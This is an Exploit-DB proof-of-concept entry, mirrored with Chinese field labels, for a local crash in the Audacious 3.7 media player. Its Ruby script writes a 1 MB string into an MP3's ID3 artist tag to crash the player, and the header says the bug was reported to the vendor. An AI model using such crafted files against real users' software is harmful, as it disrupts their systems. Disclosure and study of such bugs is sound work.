Audacious 3.7 – ID3 Local Crash (PoC)

  • 作者: Antonio Z.
    日期: 2015-11-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38791/
  • # Exploit Title: Audacious 3.7 ID3 Local Crash PoC
# Date: 11-20-2015
# Exploit Author: Antonio Z.
# Vendor Homepage: http://audacious-media-player.org/
# Software Link: http://audacious-media-player.org/download | http://distfiles.audacious-media-player.org/audacious-3.7-win32.zip
# Version: 3.7
# Tested on: Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64, Debian 8.2 x86-x64
# Comment: Issue was reported: http://redmine.audacious-media-player.org/issues/595

require 'fileutils'
require 'mp3info'

evil = 'A' * 1048576

FileUtils.cp 'Test_Case.mp3', 'Test_Case_PoC.mp3'

Mp3Info.open('Test_Case_PoC.mp3') do |mp3|
mp3.tag.artist = evil
end